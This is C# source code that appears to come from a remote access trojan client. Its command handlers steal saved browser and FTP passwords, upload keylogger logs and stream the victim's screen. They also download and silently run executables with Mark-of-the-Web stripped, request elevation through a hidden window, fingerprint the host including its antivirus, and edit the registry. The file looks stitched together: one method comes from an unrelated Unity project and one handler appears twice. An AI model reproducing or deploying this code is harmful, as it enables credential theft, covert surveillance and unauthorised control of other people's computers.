public static void HandleDoProcessStart(DoProcessStart command, Networking.Client client)
{
if (string.IsNullOrEmpty(command.ApplicationName))
{
client.Send(new SetStatus {
Message = "Process could not be started!"
});
return;
}
try
{
ProcessStartInfo startInfo = new ProcessStartInfo
{
UseShellExecute = true,
FileName = command.ApplicationName
};
Process.Start(startInfo);
}
catch
{
client.Send(new SetStatus {
Message = "Process could not be started!"
});
}
finally
{
HandleGetProcesses(new GetProcesses(), client);
}
}
public static void HandleDoAskElevate(DoAskElevate command, Networking.Client client)
{
if (WindowsAccountHelper.GetAccountType() != "Admin")
{
ProcessStartInfo processStartInfo = new ProcessStartInfo
{
FileName = "cmd",
Verb = "runas",
Arguments = "/k START \"\" \"" + ClientData.CurrentPath + "\" & EXIT",
WindowStyle = ProcessWindowStyle.Hidden,
UseShellExecute = true
};
MutexHelper.CloseMutex(); // close the mutex so our new process will run
try
{
Process.Start(processStartInfo);
}
catch
{
client.Send(new SetStatus {
Message = "User refused the elevation request."
});
MutexHelper.CreateMutex(Settings.MUTEX); // re-grab the mutex
return;
}
Program.ConnectClient.Exit();
}
else
{
client.Send(new SetStatus {
Message = "Process already elevated."
});
}
}
public static void HandleGetAuthentication(GetAuthentication command, Networking.Client client)
{
GeoLocationHelper.Initialize();
client.Send(new GetAuthenticationResponse
{
Version = Settings.VERSION,
OperatingSystem = PlatformHelper.FullName,
AccountType = WindowsAccountHelper.GetAccountType(),
Country = GeoLocationHelper.GeoInfo.Country,
CountryCode = GeoLocationHelper.GeoInfo.CountryCode,
Region = GeoLocationHelper.GeoInfo.Region,
City = GeoLocationHelper.GeoInfo.City,
ImageIndex = GeoLocationHelper.ImageIndex,
Id = DevicesHelper.HardwareId,
Username = WindowsAccountHelper.GetName(),
PcName = SystemHelper.GetPcName(),
Tag = Settings.TAG
});
if (ClientData.AddToStartupFailed)
{
Thread.Sleep(2000);
client.Send(new SetStatus
{
Message = "Adding to startup failed."
});
}
}
public static void HandleDoUploadAndExecute(DoUploadAndExecute command, Networking.Client client)
{
if (!RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Add(command.Id, FileHelper.GetTempFilePath(Path.GetExtension(command.FileName)));
}
string filePath = RenamedFiles[command.Id];
try
{
if (command.CurrentBlock == 0 && Path.GetExtension(filePath) == ".exe" && !FileHelper.HasExecutableIdentifier(command.Block))
{
throw new Exception("No executable file");
}
var destFile = new FileSplitLegacy(filePath);
if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
{
throw new Exception(destFile.LastError);
}
if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute
{
if (RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Remove(command.Id);
}
FileHelper.DeleteZoneIdentifier(filePath);
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = false;
startInfo.FileName = filePath;
Process.Start(startInfo);
client.Send(new SetStatus {
Message = "Executed File"
});
}
}
catch (Exception ex)
{
if (RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Remove(command.Id);
}
NativeMethods.DeleteFile(filePath);
client.Send(new SetStatus {
Message = $"Execution failed: {ex.Message}"
});
}
}
public static void HandleGetDrives(GetDrives command, Networking.Client client)
{
DriveInfo[] driveInfos;
try
{
driveInfos = DriveInfo.GetDrives().Where(d => d.IsReady).ToArray();
}
catch (IOException)
{
client.Send(new SetStatusFileManager {
Message = "GetDrives I/O error", SetLastDirectorySeen = false
});
return;
}
catch (UnauthorizedAccessException)
{
client.Send(new SetStatusFileManager {
Message = "GetDrives No permission", SetLastDirectorySeen = false
});
return;
}
if (driveInfos.Length == 0)
{
client.Send(new SetStatusFileManager {
Message = "GetDrives No drives", SetLastDirectorySeen = false
});
return;
}
Models.Drive[] drives = new Models.Drive[driveInfos.Length];
for (int i = 0; i < drives.Length; i++)
{
try
{
var displayName = !string.IsNullOrEmpty(driveInfos[i].VolumeLabel)
? string.Format("{0} ({1}) [{2}, {3}]", driveInfos[i].RootDirectory.FullName,
driveInfos[i].VolumeLabel,
driveInfos[i].DriveType.ToFriendlyString(), driveInfos[i].DriveFormat)
: string.Format("{0} [{1}, {2}]", driveInfos[i].RootDirectory.FullName,
driveInfos[i].DriveType.ToFriendlyString(), driveInfos[i].DriveFormat);
drives[i] = new Models.Drive
{
DisplayName = displayName, RootDirectory = driveInfos[i].RootDirectory.FullName
};
}
catch (Exception)
{
}
}
client.Send(new GetDrivesResponse {
Drives = drives
});
}
public static void HandleDoUploadFile(FileTransferChunk command, Networking.Client client)
{
try
{
if (CanceledFileTransfers.ContainsKey(command.Id))
{
return;
}
if (command.Chunk.Offset == 0 && File.Exists(command.FilePath))
{
NativeMethods.DeleteFile(command.FilePath); // delete existing file
}
using (var destFile = new FileSplit(command.FilePath, FileAccess.Write))
{
destFile.WriteChunk(command.Chunk);
}
}
catch (Exception)
{
CanceledFileTransfers.Add(command.Id, "error");
client.Send(new FileTransferCancel
{
Id = command.Id,
Reason = "Error writing file"
});
}
}
public static void HandleGetConnections(Networking.Client client, GetConnections packet)
{
var table = GetTable();
var connections = new Models.TcpConnection[table.Length];
for (int i = 0; i < table.Length; i++)
{
string processName;
try
{
var p = Process.GetProcessById((int)table[i].owningPid);
processName = p.ProcessName;
}
catch
{
processName = $"PID: {table[i].owningPid}";
}
connections[i] = new Models.TcpConnection {
ProcessName = processName,
LocalAddress = table[i].LocalAddress.ToString(),
LocalPort = table[i].LocalPort,
RemoteAddress = table[i].RemoteAddress.ToString(),
RemotePort = table[i].RemotePort,
State = (ConnectionState)table[i].state
};
}
client.Send(new GetConnectionsResponse {
Connections = connections
});
}
public static void HandleDoShutdownAction(DoShutdownAction command, Networking.Client client)
{
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
switch (command.Action)
{
case ShutdownAction.Shutdown:
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.UseShellExecute = true;
startInfo.Arguments = "/s /t 0"; // shutdown
startInfo.FileName = "shutdown";
Process.Start(startInfo);
break;
case ShutdownAction.Restart:
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.UseShellExecute = true;
startInfo.Arguments = "/r /t 0"; // restart
startInfo.FileName = "shutdown";
Process.Start(startInfo);
break;
case ShutdownAction.Standby:
Application.SetSuspendState(PowerState.Suspend, true, true); // standby
break;
}
}
catch (Exception ex)
{
client.Send(new SetStatus {
Message = $"Action failed: {ex.Message}"
});
}
}
public static void Uninstall(Networking.Client client)
{
try
{
if (Settings.STARTUP)
{
Startup.RemoveFromStartup();
}
string batchFile = BatchFile.CreateUninstallBatch(ClientData.CurrentPath, Keylogger.LogDirectory);
if (string.IsNullOrEmpty(batchFile))
{
throw new Exception("Could not create uninstall-batch file");
}
ProcessStartInfo startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
UseShellExecute = true,
FileName = batchFile
};
Process.Start(startInfo);
Program.ConnectClient.Exit();
}
catch (Exception ex)
{
client.Send(new SetStatus {
Message = $"Uninstall failed: {ex.Message}"
});
}
}
public static void HandleCreateRegistryKey(DoCreateRegistryKey packet, Networking.Client client)
{
GetCreateRegistryKeyResponse responsePacket = new GetCreateRegistryKeyResponse();
string errorMsg;
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryKey(packet.ParentPath, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Match = new RegSeekerMatch
{
Key = newKeyName,
Data = RegistryKeyHelper.GetDefaultValues(),
HasSubKeys = false
};
responsePacket.ParentPath = packet.ParentPath;
client.Send(responsePacket);
}
public static void HandleDoClientUninstall(DoClientUninstall command, Networking.Client client)
{
client.Send(new SetStatus {
Message = "Uninstalling... good bye :-("
});
ClientUninstaller.Uninstall(client);
}
public static void HandleGetMonitors(GetMonitors command, Networking.Client client)
{
if (Screen.AllScreens.Length > 0)
{
client.Send(new GetMonitorsResponse {
Number = Screen.AllScreens.Length
});
}
}
public void Send(string message)
{
if (connection == null)
{
Debug.LogWarning("No connection assigned");
return;
}
connection.Send(message);
}
public static void HandleDoDownloadFileCancel(FileTransferCancel command, Networking.Client client)
{
if (!CanceledFileTransfers.ContainsKey(command.Id))
{
CanceledFileTransfers.Add(command.Id, "canceled");
client.Send(new FileTransferCancel
{
Id = command.Id,
Reason = "Canceled"
});
}
}
public static void HandleDoShowMessageBox(DoShowMessageBox command, Networking.Client client)
{
new Thread(() =>
{
MessageBox.Show(command.Text, command.Caption,
(MessageBoxButtons)Enum.Parse(typeof(MessageBoxButtons), command.Button),
(MessageBoxIcon)Enum.Parse(typeof(MessageBoxIcon), command.Icon),
MessageBoxDefaultButton.Button1, MessageBoxOptions.DefaultDesktopOnly);
}).Start();
client.Send(new SetStatus {
Message = "Showed Messagebox"
});
}
public static void HandleGetPasswords(GetPasswords packet, Networking.Client client)
{
List <RecoveredAccount> recovered = new List <RecoveredAccount>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(Yandex.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
client.Send(new GetPasswordsResponse {
RecoveredAccounts = recovered
});
}
public static void HandleDoDownloadFile(FileTransferRequest command, Networking.Client client)
{
new Thread(() =>
{
LimitThreads.WaitOne();
try
{
using (var srcFile = new FileSplit(command.RemotePath, FileAccess.Read))
{
ActiveTransfers[command.Id] = srcFile;
foreach (var chunk in srcFile)
{
if (!client.Connected || !ActiveTransfers.ContainsKey(command.Id))
{
break;
}
// blocking sending might not be required, needs further testing
client.SendBlocking(new FileTransferChunk
{
Id = command.Id,
FilePath = command.RemotePath,
FileSize = srcFile.FileSize,
Chunk = chunk
});
}
}
}
catch (Exception)
{
client.Send(new FileTransferCancel
{
Id = command.Id,
Reason = "Error reading file"
});
}
finally
{
RemoveFileTransfer(command.Id);
LimitThreads.Release();
}
}).Start();
}
public static void Update(Networking.Client client, string newFilePath)
{
try
{
FileHelper.DeleteZoneIdentifier(newFilePath);
var bytes = File.ReadAllBytes(newFilePath);
if (!FileHelper.IsValidExecuteableFile(bytes))
{
throw new Exception("no pe file");
}
string batchFile = FileHelper.CreateUpdateBatch(newFilePath, Settings.INSTALL && Settings.HIDEFILE);
if (string.IsNullOrEmpty(batchFile))
{
throw new Exception("Could not create update batch file.");
}
ProcessStartInfo startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
UseShellExecute = true,
FileName = batchFile
};
Process.Start(startInfo);
if (Settings.STARTUP)
{
Startup.RemoveFromStartup();
}
Program.ConnectClient.Exit();
}
catch (Exception ex)
{
NativeMethods.DeleteFile(newFilePath);
client.Send(new SetStatus {
Message = $"Update failed: {ex.Message}"
});
}
}
public static void HandleGetSystemInfo(GetSystemInfo command, Networking.Client client)
{
try
{
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
var domainName = (!string.IsNullOrEmpty(properties.DomainName)) ? properties.DomainName : "-";
var hostName = (!string.IsNullOrEmpty(properties.HostName)) ? properties.HostName : "-";
var geoInfo = GeoInformationFactory.GetGeoInformation();
List <Tuple <string, string> > lstInfos = new List <Tuple <string, string> >
{
new Tuple <string, string>("Processor (CPU)", DevicesHelper.GetCpuName()),
new Tuple <string, string>("Memory (RAM)", $"{DevicesHelper.GetTotalRamAmount()} MB"),
new Tuple <string, string>("Video Card (GPU)", DevicesHelper.GetGpuName()),
new Tuple <string, string>("Username", WindowsAccountHelper.GetName()),
new Tuple <string, string>("PC Name", SystemHelper.GetPcName()),
new Tuple <string, string>("Domain Name", domainName),
new Tuple <string, string>("Host Name", hostName),
new Tuple <string, string>("System Drive", Path.GetPathRoot(Environment.SystemDirectory)),
new Tuple <string, string>("System Directory", Environment.SystemDirectory),
new Tuple <string, string>("Uptime", SystemHelper.GetUptime()),
new Tuple <string, string>("MAC Address", DevicesHelper.GetMacAddress()),
new Tuple <string, string>("LAN IP Address", DevicesHelper.GetLanIp()),
new Tuple <string, string>("WAN IP Address", geoInfo.IpAddress),
new Tuple <string, string>("ASN", geoInfo.Asn),
new Tuple <string, string>("ISP", geoInfo.Isp),
new Tuple <string, string>("Antivirus", SystemHelper.GetAntivirus()),
new Tuple <string, string>("Firewall", SystemHelper.GetFirewall()),
new Tuple <string, string>("Time Zone", geoInfo.Timezone),
new Tuple <string, string>("Country", geoInfo.Country)
};
client.Send(new GetSystemInfoResponse {
SystemInfos = lstInfos
});
}
catch
{
}
}
public static void HandleDeleteRegistryKey(DoDeleteRegistryKey packet, Networking.Client client)
{
GetDeleteRegistryKeyResponse responsePacket = new GetDeleteRegistryKeyResponse();
string errorMsg;
try
{
responsePacket.IsError = !(RegistryEditor.DeleteRegistryKey(packet.KeyName, packet.ParentPath, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.ParentPath = packet.ParentPath;
responsePacket.KeyName = packet.KeyName;
client.Send(responsePacket);
}
public static void HandleChangeRegistryValue(DoChangeRegistryValue packet, Networking.Client client)
{
GetChangeRegistryValueResponse responsePacket = new GetChangeRegistryValueResponse();
string errorMsg;
try
{
responsePacket.IsError = !(RegistryEditor.ChangeRegistryValue(packet.Value, packet.KeyPath, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.KeyPath = packet.KeyPath;
responsePacket.Value = packet.Value;
client.Send(responsePacket);
}
public static void HandleGetRegistryKey(DoLoadRegistryKey packet, Networking.Client client)
{
GetRegistryKeysResponse responsePacket = new GetRegistryKeysResponse();
try
{
RegistrySeeker seeker = new RegistrySeeker();
seeker.BeginSeeking(packet.RootKeyName);
responsePacket.Matches = seeker.Matches;
responsePacket.IsError = false;
}
catch (Exception e)
{
responsePacket.IsError = true;
responsePacket.ErrorMsg = e.Message;
}
responsePacket.RootKey = packet.RootKeyName;
client.Send(responsePacket);
}
public static void HandleGetProcesses(GetProcesses command, Networking.Client client)
{
Process[] pList = Process.GetProcesses();
var processes = new Models.Process[pList.Length];
for (int i = 0; i < pList.Length; i++)
{
var process = new Models.Process
{
Name = pList[i].ProcessName + ".exe",
Id = pList[i].Id,
MainWindowTitle = pList[i].MainWindowTitle
};
processes[i] = process;
}
client.Send(new GetProcessesResponse {
Processes = processes
});
}
public static void HandleCreateRegistryValue(DoCreateRegistryValue packet, Networking.Client client)
{
GetCreateRegistryValueResponse responsePacket = new GetCreateRegistryValueResponse();
string errorMsg;
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryValue(packet.KeyPath, packet.Kind, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Value = RegistryKeyHelper.CreateRegValueData(newKeyName, packet.Kind, packet.Kind.GetDefault());
responsePacket.KeyPath = packet.KeyPath;
client.Send(responsePacket);
}
public static void HandleDoVisitWebsite(DoVisitWebsite command, Networking.Client client)
{
string url = command.Url;
if (!url.StartsWith("http"))
{
url = "http://" + url;
}
if (Uri.IsWellFormedUriString(url, UriKind.RelativeOrAbsolute))
{
if (!command.Hidden)
{
Process.Start(url);
}
else
{
try
{
HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(url);
request.UserAgent =
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A";
request.AllowAutoRedirect = true;
request.Timeout = 10000;
request.Method = "GET";
using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
{
}
}
catch
{
}
}
client.Send(new SetStatus {
Message = "Visited Website"
});
}
}
public static void HandleDoUploadFile(FileTransferChunk command, Networking.Client client)
{
try
{
if (command.Chunk.Offset == 0)
{
if (File.Exists(command.FilePath))
{
NativeMethods.DeleteFile(command.FilePath); // delete existing file
}
ActiveTransfers[command.Id] = new FileSplit(command.FilePath, FileAccess.Write);
}
if (!ActiveTransfers.ContainsKey(command.Id))
{
return;
}
var destFile = ActiveTransfers[command.Id];
destFile.WriteChunk(command.Chunk);
if (destFile.FileSize == command.FileSize)
{
RemoveFileTransfer(command.Id);
}
}
catch (Exception)
{
RemoveFileTransfer(command.Id);
client.Send(new FileTransferCancel
{
Id = command.Id,
Reason = "Error writing file"
});
}
}
public static void HandleDoClientUpdate(DoClientUpdate command, Networking.Client client)
{
// i dont like this updating... if anyone has a better idea feel free to edit it
if (string.IsNullOrEmpty(command.DownloadUrl))
{
if (!RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Add(command.Id, FileHelper.GetTempFilePath(".exe"));
}
string filePath = RenamedFiles[command.Id];
try
{
if (command.CurrentBlock == 0 && !FileHelper.HasExecutableIdentifier(command.Block))
{
throw new Exception("No executable file");
}
var destFile = new FileSplitLegacy(filePath);
if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
{
throw new Exception(destFile.LastError);
}
if ((command.CurrentBlock + 1) == command.MaxBlocks) // Upload finished
{
if (RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Remove(command.Id);
}
client.Send(new SetStatus {
Message = "Updating..."
});
ClientUpdater.Update(client, filePath);
}
}
catch (Exception ex)
{
if (RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Remove(command.Id);
}
NativeMethods.DeleteFile(filePath);
client.Send(new SetStatus {
Message = $"Update failed: {ex.Message}"
});
}
return;
}
new Thread(() =>
{
client.Send(new SetStatus {
Message = "Downloading file..."
});
string tempFile = FileHelper.GetTempFilePath(".exe");
try
{
using (WebClient c = new WebClient())
{
c.Proxy = null;
c.DownloadFile(command.DownloadUrl, tempFile);
}
}
catch
{
client.Send(new SetStatus {
Message = "Download failed!"
});
return;
}
client.Send(new SetStatus {
Message = "Replacing executable..."
});
ClientUpdater.Update(client, tempFile);
}).Start();
}
public static void HandleGetDesktop(GetDesktop command, Networking.Client client)
{
// TODO: Capture mouse in frames: https://stackoverflow.com/questions/6750056/how-to-capture-the-screen-and-mouse-pointer-using-windows-apis
var monitorBounds = ScreenHelper.GetBounds((command.DisplayIndex));
var resolution = new Resolution {
Height = monitorBounds.Height, Width = monitorBounds.Width
};
if (StreamCodec == null)
{
StreamCodec = new UnsafeStreamCodec(command.Quality, command.DisplayIndex, resolution);
}
if (command.CreateNew || StreamCodec.ImageQuality != command.Quality || StreamCodec.Monitor != command.DisplayIndex ||
StreamCodec.Resolution != resolution)
{
if (StreamCodec != null)
{
StreamCodec.Dispose();
}
StreamCodec = new UnsafeStreamCodec(command.Quality, command.DisplayIndex, resolution);
}
BitmapData desktopData = null;
Bitmap desktop = null;
try
{
desktop = ScreenHelper.CaptureScreen(command.DisplayIndex);
desktopData = desktop.LockBits(new Rectangle(0, 0, desktop.Width, desktop.Height),
ImageLockMode.ReadWrite, desktop.PixelFormat);
using (MemoryStream stream = new MemoryStream())
{
if (StreamCodec == null)
{
throw new Exception("StreamCodec can not be null.");
}
StreamCodec.CodeImage(desktopData.Scan0,
new Rectangle(0, 0, desktop.Width, desktop.Height),
new Size(desktop.Width, desktop.Height),
desktop.PixelFormat, stream);
client.Send(new GetDesktopResponse
{
Image = stream.ToArray(),
Quality = StreamCodec.ImageQuality,
Monitor = StreamCodec.Monitor,
Resolution = StreamCodec.Resolution
});
}
}
catch (Exception)
{
if (StreamCodec != null)
{
client.Send(new GetDesktopResponse
{
Image = null,
Quality = StreamCodec.ImageQuality,
Monitor = StreamCodec.Monitor,
Resolution = StreamCodec.Resolution
});
}
StreamCodec = null;
}
finally
{
if (desktop != null)
{
if (desktopData != null)
{
try
{
desktop.UnlockBits(desktopData);
}
catch
{
}
}
desktop.Dispose();
}
}
}
public static void HandleGetKeyloggerLogs(GetKeyloggerLogs command, Networking.Client client)
{
new Thread(() =>
{
try
{
int index = 1;
if (!Directory.Exists(Keylogger.LogDirectory))
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = "",
Index = index,
FileCount = 0
});
return;
}
FileInfo[] iFiles = new DirectoryInfo(Keylogger.LogDirectory).GetFiles();
if (iFiles.Length == 0)
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = "",
Index = index,
FileCount = 0
});
return;
}
foreach (FileInfo file in iFiles)
{
var srcFile = new FileSplitLegacy(file.FullName);
if (srcFile.MaxBlocks < 0)
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = srcFile.LastError,
Index = index,
FileCount = iFiles.Length
});
}
for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++)
{
byte[] block;
if (srcFile.ReadBlock(currentBlock, out block))
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = Path.GetFileName(file.Name),
Block = block,
MaxBlocks = srcFile.MaxBlocks,
CurrentBlock = currentBlock,
CustomMessage = srcFile.LastError,
Index = index,
FileCount = iFiles.Length
});
//Thread.Sleep(200);
}
else
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = srcFile.LastError,
Index = index,
FileCount = iFiles.Length
});
}
}
index++;
}
}
catch (Exception ex)
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = ex.Message,
Index = -1,
FileCount = -1
});
}
}).Start();
}
public static void HandleDoDownloadAndExecute(DoDownloadAndExecute command,
Networking.Client client)
{
client.Send(new SetStatus {
Message = "Downloading file..."
});
new Thread(() =>
{
string tempFile = FileHelper.GetTempFilePath(".exe");
try
{
using (WebClient c = new WebClient())
{
c.Proxy = null;
c.DownloadFile(command.Url, tempFile);
}
}
catch
{
client.Send(new SetStatus {
Message = "Download failed"
});
return;
}
client.Send(new SetStatus {
Message = "Downloaded File"
});
try
{
FileHelper.DeleteZoneIdentifier(tempFile);
var bytes = File.ReadAllBytes(tempFile);
if (!FileHelper.HasExecutableIdentifier(bytes))
{
throw new Exception("no pe file");
}
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = false;
startInfo.FileName = tempFile;
Process.Start(startInfo);
}
catch (Exception ex)
{
NativeMethods.DeleteFile(tempFile);
client.Send(new SetStatus {
Message = $"Execution failed: {ex.Message}"
});
return;
}
client.Send(new SetStatus {
Message = "Executed File"
});
}).Start();
}